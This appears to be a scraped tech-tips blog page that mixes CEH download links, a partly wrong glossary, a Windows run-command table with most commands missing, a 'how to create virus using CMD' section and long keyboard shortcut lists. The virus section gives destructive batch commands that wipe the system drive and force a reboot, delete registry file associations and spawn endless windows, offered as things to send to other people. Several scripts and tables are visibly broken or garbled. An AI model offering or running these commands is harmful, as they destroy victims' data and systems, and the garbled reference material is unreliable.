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CEH v9 : Certified Ethical Hacker v9 PDFs & Tols Download

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CEHv9 : Certified Ethical Hacker v9 Ebook Module Download 

CEHv9 : Certified Ethical Hacker v9 Tools Download

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Glossary of Computer World

  1. Allocation Unit The smallest space that DOS can access on a Disk. The size of these is dependent on the size of disk and the type of FAT used
  2. APPEND Allows programs to open data files in specified directories as if they were in the current directory
  3. ASCII American Standard Code for Information Exchange
  4. ASSIGN Redirects requests for disk operations on one drive to a different drive
  5. ATM Automated Teller Machine - A special purpose transaction machine use to provide remote baking service
  6. ATTRIB Displays or changes file attributes
  7. ATTRIBUTES A text file used by the system at startup
  8. AUTOEXEC.BAT A text file used by the system at startup
  9. BACKUP Backs up one or more files from one disk to another
  10. BASIC Beginners All purpose Symbolic Instruction Code. A programming language

Run Command For Windows

Run commands for windows 

To Access…
Run Command
Accessibility Controls
Accessibility Wizard
Add Hardware Wizard
Add/Remove Programs
Certificate Manager
Component Services
Computer Management
Device Manager
Disk Defragment
Disk Management
Disk Partition Manager
Display Properties
control desktop
Display Properties
Event Viewer
Group Policy Editor (XP Prof)
IP Configuration (Display Connection Configuration)

ipconfig /all
IP Configuration (Display DNS Cache Contents)

ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)

ipconfig /flushdns
IP Configuration (Release All Connections)

ipconfig /release
IP Configuration (Renew All Connections)

ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)

ipconfig /registerdns
IP Configuration (Display DHCP Class ID)

ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)

ipconfig /setclassid
Local Security Settings
Local Users and Groups
Network Connections
Network Setup Wizard
Password Properties
Remote Desktop
Shared Folders
System Configuration Editor
System Configuration Utility
System File Checker Utility (Scan Immediately)

sfc /scannow
System Information
System Properties
Task Manager
TCP Tester
Telnet Client
User Account Management
Utility Manager
Windows Firewall

CMD Tricks

How to create Virus using CMD or Command Prompt?

Hey guys today am going to teach you that how you can create virus using command prompt.
guys be careful, don't do it in your system, and am not responsible for any damage of your system.

1. The blue screen of Death [this might be dangerous]

The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install your windows again


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2. Stupidity Shutdown

This pops up a funny message then will shutdown the computer


@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10

3. Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)


START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
ECHO Your computer has been fcked. Have a nice day.

4. Endless Notepads

This will pop up endless notepads until the computer freezes and crashes*


@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

5. Crazy caps lock

This constantly turns caps lock on and off really fast continuously*


Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

6. Endless Enter

This constantly makes it so the enter button is being pressed continuesly*


Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

7. Endless Backspace

This makes it so the backspace key is constantly being pressed*


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

8. Popping CD Drives

This will make the CD drives constantly pop out*


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 100

Windows Shortcuts That Mostly Girls Don't Know

Windows system key combinations

  • F1: Help
  • CTRL+ESC: Open Start menu
  • ALT+TAB: Switch between open programs
  • ALT+F4: Quit program
  • SHIFT+DELETE: Delete item permanently
  • Windows Logo+L: Lock the computer (without using CTRL+ALT+DELETE)

Windows program key combinations

  • CTRL+C: Copy
  • CTRL+X: Cut
  • CTRL+V: Paste
  • CTRL+Z: Undo
  • CTRL+B: Bold
  • CTRL+U: Underline
  • CTRL+I: Italic

Mouse click/keyboard modifier combinations for shell objects

  • SHIFT+right click: Displays a shortcut menu containing alternative commands
  • SHIFT+double click: Runs the alternate default command (the second item on the menu)
  • ALT+double click: Displays properties
  • SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin

General keyboard-only commands

  • F1: Starts Windows Help
  • F10: Activates menu bar options
  • SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
  • CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
  • CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
  • CTRL+SHIFT+ESC: Opens Windows Task Manager
  • ALT+DOWN ARROW: Opens a drop-down list box
  • ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
  • SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
  • ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
  • ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
  • CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
  • ALT+underlined letter in menu: Opens the menu
  • ALT+F4: Closes the current window
  • CTRL+F4: Closes the current Multiple Document Interface (MDI) window
  • ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Finddialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)

Shell objects and general folder/Windows Explorer shortcuts

For a selected object:
  • F2: Rename object
  • F3: Find all files
  • CTRL+X: Cut
  • CTRL+C: Copy
  • CTRL+V: Paste
  • SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin
  • ALT+ENTER: Open the properties for the selected object

To copy a file

Press and hold down the CTRL key while you drag the file to another folder.

To create a shortcut

Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.

General folder/shortcut control

  • F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
  • F5: Refreshes the current window.
  • F6: Moves among panes in Windows Explorer
  • CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
  • CTRL+Z: Undo the last command
  • CTRL+A: Select all the items in the current window
  • BACKSPACE: Switch to the parent folder
  • SHIFT+click+Close button: For folders, close the current folder plus all parent folders

Windows Explorer tree control

  • Numeric Keypad *: Expands everything under the current selection
  • Numeric Keypad +: Expands the current selection
  • Numeric Keypad -: Collapses the current selection.
  • RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
  • LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent

Properties control

  • CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs

Accessibility shortcuts

  • Press SHIFT five times: Toggles StickyKeys on and off
  • Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
  • Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
  • Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off
  • Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off

Microsoft Natural Keyboard keys

  • Windows Logo: Start menu
  • Windows Logo+R: Run dialog box
  • Windows Logo+M: Minimize all
  • SHIFT+Windows Logo+M: Undo minimize all
  • Windows Logo+F1: Help
  • Windows Logo+E: Windows Explorer
  • Windows Logo+F: Find files or folders
  • Windows Logo+D: Minimizes all open windows and displays the desktop
  • CTRL+Windows Logo+F: Find computer
  • CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
  • Windows Logo+TAB: Cycle through taskbar buttons
  • Windows Logo+Break: System Properties dialog box
  • Application key: Displays a shortcut menu for the selected item

Microsoft Natural Keyboard with IntelliType software installed

  • Windows Logo+L: Log off Windows
  • Windows Logo+P: Starts Print Manager
  • Windows Logo+C: Opens Control Panel
  • Windows Logo+V: Starts Clipboard
  • Windows Logo+K: Opens Keyboard Properties dialog box
  • Windows Logo+I: Opens Mouse Properties dialog box
  • Windows Logo+A: Starts Accessibility Options (if installed)
  • Windows Logo+SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys
  • Windows Logo+S: Toggles CAPS LOCK on and off

Dialog box keyboard commands

  • TAB: Move to the next control in the dialog box
  • SHIFT+TAB: Move to the previous control in the dialog box
  • SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
  • ENTER: Equivalent to clicking the selected button (the button with the outline)
  • ESC: Equivalent to clicking the Cancel button
  • ALT+underlined letter in dialog box item: Move to the corresponding item